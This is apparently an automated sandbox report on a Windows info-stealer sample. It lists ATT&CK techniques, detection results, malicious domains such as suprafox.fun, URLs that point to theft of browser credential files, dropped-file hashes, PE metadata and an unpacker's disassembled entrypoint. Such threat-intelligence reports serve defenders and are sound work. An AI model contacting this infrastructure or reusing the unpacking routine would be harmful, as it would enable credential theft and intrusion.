Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	541 Security Software Discovery	Remote Desktop Protocol	21 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	341 Virtualization/Sandbox Evasion	Security Account Manager	341 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	311 Process Injection	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	112 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	4 Obfuscated Files or Information	Cached Domain Credentials	11 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	12 Software Packing	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Timestomp	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file.exe	24%	ReversingLabs
file.exe	100%	Avira	HEUR/AGEN.1304159
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://suprafox.fun/E	100%	Avira URL Cloud	malware
http://suprafox.fun/x	100%	Avira URL Cloud	malware
http://suprafox.fun/ec	100%	Avira URL Cloud	malware
http://suprafox.fun/ia	100%	Avira URL Cloud	malware
http://suprafox.fun/bh1	100%	Avira URL Cloud	malware
http://suprafox.fun/Q	100%	Avira URL Cloud	malware
http://suprafox.fun:80/apiFirefox/fqs92o4p.default-release/key4.db	100%	Avira URL Cloud	malware
http://suprafox.fun/api	100%	Avira URL Cloud	malware
http://suprafox.fun/r	100%	Avira URL Cloud	malware
http://suprafox.fun/apiQ	100%	Avira URL Cloud	malware
http://suprafox.fun:80/apitxt	100%	Avira URL Cloud	malware
http://suprafox.fun/api7gQA	100%	Avira URL Cloud	malware
http://suprafox.fun/m	100%	Avira URL Cloud	malware
http://suprafox.fun:80/apiL	100%	Avira URL Cloud	malware
http://suprafox.fun/ipA	100%	Avira URL Cloud	malware
http://suprafox.fun/apih	100%	Avira URL Cloud	malware
http://suprafox.fun/	100%	Avira URL Cloud	malware
suprafo.fun	0%	Avira URL Cloud	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
http://suprafox.fun:80/apixt	100%	Avira URL Cloud	malware
http://suprafox.fun:80/apietting_ai_detect=deleted;	100%	Avira URL Cloud	malware
http://suprafox.fun:80/api	100%	Avira URL Cloud	malware
dannyleagy.fun	100%	Avira URL Cloud	malware
http://suprafox.fun:80/apireServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentic	100%	Avira URL Cloud	malware
http://suprafox.fun/pi	100%	Avira URL Cloud	malware
http://suprafox.fun/apiiF	100%	Avira URL Cloud	malware
http://suprafox.fun/9	100%	Avira URL Cloud	malware
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
suprafox.fun	104.21.92.91	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://suprafox.fun/api	true	Avira URL Cloud: malware	unknown
suprafo.fun	true	Avira URL Cloud: safe	unknown
dannyleagy.fun	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://suprafox.fun/ec	AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	file.exe	false	URL Reputation: safe	unknown
http://suprafox.fun/bh1	AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun/ia	AppLaunch.exe, 00000001.00000002.2148877113.0000000007A8C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun/Q	AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun/E	AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	AppLaunch.exe, 00000001.00000002.2141662418.000000000761E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000001.00000002.2141662418.0000000007659000.00000004.00000020.00020000.00000000.sdmp	false		high
http://suprafox.fun:80/apiFirefox/fqs92o4p.default-release/key4.db	AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun/r	AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun/x	AppLaunch.exe, 00000001.00000002.2148877113.0000000007A8C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun/m	AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	AppLaunch.exe, 00000001.00000002.2141662418.00000000075FB000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000001.00000002.2141662418.0000000007636000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	false		high
http://suprafox.fun:80/apitxt	AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun/e	AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://suprafox.fun/ipA	AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	AppLaunch.exe, 00000001.00000002.2161146513.0000000007DAA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://suprafox.fun/apiQ	AppLaunch.exe, 00000001.00000002.2148877113.0000000007B64000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun:80/apiL	AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun/api7gQA	AppLaunch.exe, 00000001.00000002.2141662418.00000000075B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://sectigo.com/CPS0	file.exe	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	false		high
http://suprafox.fun/apih	AppLaunch.exe, 00000001.00000002.2148877113.0000000007A8C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun/	AppLaunch.exe, 00000001.00000002.2148877113.0000000007A8C000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	AppLaunch.exe, 00000001.00000002.2141662418.000000000761E000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000001.00000002.2141662418.0000000007659000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	false		high
http://suprafox.fun:80/apixt	AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	AppLaunch.exe, 00000001.00000002.2161146513.0000000007DAA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://suprafox.fun/apiq	AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://suprafox.fun:80/api	AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://suprafox.fun:80/apietting_ai_detect=deleted;	AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	AppLaunch.exe, 00000001.00000002.2139857505.0000000004F9E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://suprafox.fun:80/apireServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentic	AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	file.exe	false	URL Reputation: safe	unknown
http://suprafox.fun/9	AppLaunch.exe, 00000001.00000002.2139857505.0000000004F72000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	file.exe	false	URL Reputation: safe	unknown
http://suprafox.fun/pi	AppLaunch.exe, 00000001.00000002.2148877113.0000000007A8C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	AppLaunch.exe, 00000001.00000002.2143398584.00000000077C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://suprafox.fun/apiiF	AppLaunch.exe, 00000001.00000002.2139857505.0000000004FE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	AppLaunch.exe, 00000001.00000002.2141662418.00000000075FB000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000001.00000002.2141662418.0000000007636000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	AppLaunch.exe, 00000001.00000002.2143398584.0000000007798000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.92.91	suprafox.fun	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1330868
Start date and time:	2023-10-24 00:05:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@3/2@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 76% Number of executed functions: 162 Number of non-executed functions: 181
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
00:06:01	API Interceptor	1x Sleep call for process: file.exe modified
00:06:03	API Interceptor	1x Sleep call for process: AppLaunch.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://docs.google.com/presentation/d/e/2PACX-1vRAwPxZ8GrUsElXvoNe3i8gJHzqG1oI1GAhdTZIhlvrhOCU8NK--Zoii9t0K_EtXnpGnM33w6PzD4PA/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	172.67.221.175
	https://pub-e7af232458c24dbebd4e5524c130ac5c.r2.dev/vfghslh.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	XFiles Stealer	Browse	172.67.166.247
	https://r20.rs6.net/tn.jsp?f=001YxGqcaeUzLeYKYnWxJMLzm_CxzugGII5o0Our2gX0Hzr4CPGL6xJrNG7E7YtscazK6bObuLugxmKOj3PFNTN3X9Q7852HTyV7reX59UD7J2N9WZ6DfB5c6EVfef5CPFUdzrMnr2BacfFqWucBz-4fLmV98HtbSaF7crM2xR3_STTcGoLEjGt9M68kbJ8KQREruo4gKvYM-OJR82_1FT5jAuecFvc7q8H7-MtaRCGeE9c78pbJmEmoXhgZW8WmerXMU4VLepQu9o=&c=CS_eqwR3BqHHuDPXCjI9Vi5aoQN5gghcw1BqucEcG-Syf0b-d64wEg==&ch=8FDZcsF2vTXMCcPtPrJby4n6RX1dcH-d_LfkQXVSDtlcmIKFui_iCw==#dkoeppe@osugiving.com	Get hash	malicious	HTMLPhisher	Browse	104.21.0.103
	file.exe	Get hash	malicious	Babuk, Djvu, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader, Vidar	Browse	172.67.196.133
	https://brendine.com/Arvest	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://accentbnb.co.nz/all.html	Get hash	malicious	Unknown	Browse	104.18.34.229
	https://accentbnb.co.nz/all.html	Get hash	malicious	Unknown	Browse	104.17.205.31
	https://uodhtad2.page.link/29hQ	Get hash	malicious	Unknown	Browse	104.16.141.114
	Invoice 5966.htm	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://lookerstudio.google.com/s/h8_RUV7_XoM	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	https://lookerstudio.google.com/s/gZJ6cGk11sM	Get hash	malicious	Unknown	Browse	104.21.54.6
	https://m1sneakers.com/	Get hash	malicious	HTMLPhisher	Browse	172.67.219.194
	https://www.bing.com/ck/a?!&&p=e786cda54d8c12feJmltdHM9MTY5ODAxOTIwMCZpZ3VpZD0zMTM4ZGIyNi02ODFjLTZlN2ItMWE1YS1jODRlNjkwMTZmODUmaW5zaWQ9NTE2MQ&ptn=3&hsh=3&fclid=3138db26-681c-6e7b-1a5a-c84e69016f85&u=a1aHR0cHM6Ly90cmF2ZWxzcG9ydC5teC8#aW5mb0BhZHZhbmNlZGdlb3NlcnZpY2VzLmNvbQ==	Get hash	malicious	Unknown	Browse	104.17.2.184
	http://oneunitedlancaster.com/d90b6a89a22eadaa964277885baf14cdc74f2313efd20c0c8a7172aa5589d6c2/s	Get hash	malicious	Unknown	Browse	104.18.30.78
	https://na4.docusign.net/Signing/EmailStart.aspx?a=2bee8460-4446-4351-8eb0-f02097bf02ab&acct=7218fe09-fdea-452f-9141-9909d8274865&er=813c53ae-14cf-4075-92f7-d9a138fd6e8e	Get hash	malicious	Unknown	Browse	104.18.79.250
	PI_NXC009695.xlam.xlsx	Get hash	malicious	AgentTesla, zgRAT	Browse	104.21.83.102
	Account Document.html	Get hash	malicious	Unknown	Browse	104.16.126.175
	https://appdeveloper.sg/all.html	Get hash	malicious	Unknown	Browse	104.17.205.31
	Factura_wa6792900.xlam.xlsx	Get hash	malicious	Unknown	Browse	172.67.222.26

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	YdY58luuXh.exe	Get hash	malicious	LummaC Stealer	Browse
	mpsmTB0QSL.exe	Get hash	malicious	Unknown	Browse
	mpsmTB0QSL.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.7951.13978.exe	Get hash	malicious	RedLine	Browse
	9c93bf183a9ab89171bab59d98fdde6f0223dfcf53d8d2e9a174ad52.exe	Get hash	malicious	Vidar	Browse
	62ae85af9ac1742eed121e5d696aad0e78a623d15184710cd71e7704.exe	Get hash	malicious	Vidar	Browse
	1l6TgNpZ05.exe	Get hash	malicious	LummaC Stealer	Browse
	wGyOOV2H9c.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	SecuriteInfo.com.Win32.BotX-gen.12911.31840.exe	Get hash	malicious	RedLine, SmokeLoader	Browse
	VnCta69Py3.exe	Get hash	malicious	LummaC Stealer	Browse
	file.exe	Get hash	malicious	LummaC Stealer, SmokeLoader	Browse
	PS05spA6ci.exe	Get hash	malicious	LummaC Stealer	Browse
	indicat.exe	Get hash	malicious	Vidar	Browse
	SaluC9P2HK.exe	Get hash	malicious	Amadey, Raccoon Stealer v2	Browse
	file.exe	Get hash	malicious	LummaC Stealer, SmokeLoader	Browse
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse
	indicat.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse
	rj51W7g00R.exe	Get hash	malicious	RedLine	Browse
	UIB9S0uVzu.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	5.358731107079437
Encrypted:	false
SSDEEP:	12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
MD5:	93E4C46884CB6EE7CDCC4AACE78CDFAC
SHA1:	29B12D9409BA9AFE4C949F02F7D232233C0B5228
SHA-256:	2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
SHA-512:	E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	760320
Entropy (8bit):	6.561572491684602
Encrypted:	false
SSDEEP:	12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
MD5:	544CD51A596619B78E9B54B70088307D
SHA1:	4769DDD2DBC1DC44B758964ED0BD231B85880B65
SHA-256:	DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
SHA-512:	F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: YdY58luuXh.exe, Detection: malicious, Browse Filename: mpsmTB0QSL.exe, Detection: malicious, Browse Filename: mpsmTB0QSL.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.7951.13978.exe, Detection: malicious, Browse Filename: 9c93bf183a9ab89171bab59d98fdde6f0223dfcf53d8d2e9a174ad52.exe, Detection: malicious, Browse Filename: 62ae85af9ac1742eed121e5d696aad0e78a623d15184710cd71e7704.exe, Detection: malicious, Browse Filename: 1l6TgNpZ05.exe, Detection: malicious, Browse Filename: wGyOOV2H9c.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.BotX-gen.12911.31840.exe, Detection: malicious, Browse Filename: VnCta69Py3.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: PS05spA6ci.exe, Detection: malicious, Browse Filename: indicat.exe, Detection: malicious, Browse Filename: SaluC9P2HK.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: indicat.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: rj51W7g00R.exe, Detection: malicious, Browse Filename: UIB9S0uVzu.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.969741376868542
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	4'075'136 bytes
MD5:	863219f7d35d1e33f1b05ddc2bb42faa
SHA1:	2a12d30bb5d171d933b7c0c5ec23266d093335c5
SHA256:	9de7f524dcaf5b3f154521233d410711f0ae0c139bfeec16441c342534ffbc80
SHA512:	7344800672279f9791eee32a660f39a2de750c06e4ce071172392b4797b5020fd2ce770c2ffd7ab5709c20d10ef3ddb2113563fd2ae33560567ab40899a6aa13
SSDEEP:	98304:a30A8Tp0iDktBybzqwlbbnZMj6f2cOdvpOJGPRQkA:G0hFhQtBoqYbZMGhIxPR+
TLSH:	2C1633EC7340213ACDEB8572B668AA763D4D20CF1C07592B77C769FBA05104ABE447E6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P...#..D........d.. ....#...@.. ........................}.......>...@................................

File Icon


Icon Hash:	13e3e3f3f3e1e0e3

Static PE Info

General

Entrypoint:	0xa4f4d8
Entrypoint Section:	.boot
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0xD3C590F9 [Sun Aug 2 23:51:21 2082 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4328f7206db519cd4e82283211d98e83

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Hewlett-Packard Company
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	16/07/2023 18:53:21 17/07/2033 18:53:21
Subject Chain	CN=Hewlett-Packard Company
Version:	3
Thumbprint MD5:	E5D0203F9110021CED1244BC9CDA025D
Thumbprint SHA-1:	14CD0A7E677CBB2B0EBB26A5D7BC375DDB1C87AA
Thumbprint SHA-256:	6BA12C4C5504CAD206D7BAFB82E4C596759828E45BF51B0AAEFA99EA5EB20187
Serial:	19C7E09E1425D8B8485DA7438FFD570C

Entrypoint Preview

Instruction
call 00007FBA3483A450h
push ebx
mov ebx, esp
push ebx
mov esi, dword ptr [ebx+08h]
mov edi, dword ptr [ebx+10h]
cld
mov dl, 80h
mov al, byte ptr [esi]
inc esi
mov byte ptr [edi], al
inc edi
mov ebx, 00000002h
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FBA3483A2ECh
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FBA3483A353h
xor eax, eax
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
jnc 00007FBA3483A3E7h
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
add dl, dl
jne 00007FBA3483A307h
mov dl, byte ptr [esi]
inc esi
adc dl, dl
adc eax, eax
je 00007FBA3483A30Ah
push edi
mov eax, eax
sub edi, eax
mov al, byte ptr [edi]
pop edi
mov byte ptr [edi], al
inc edi
mov ebx, 00000002h
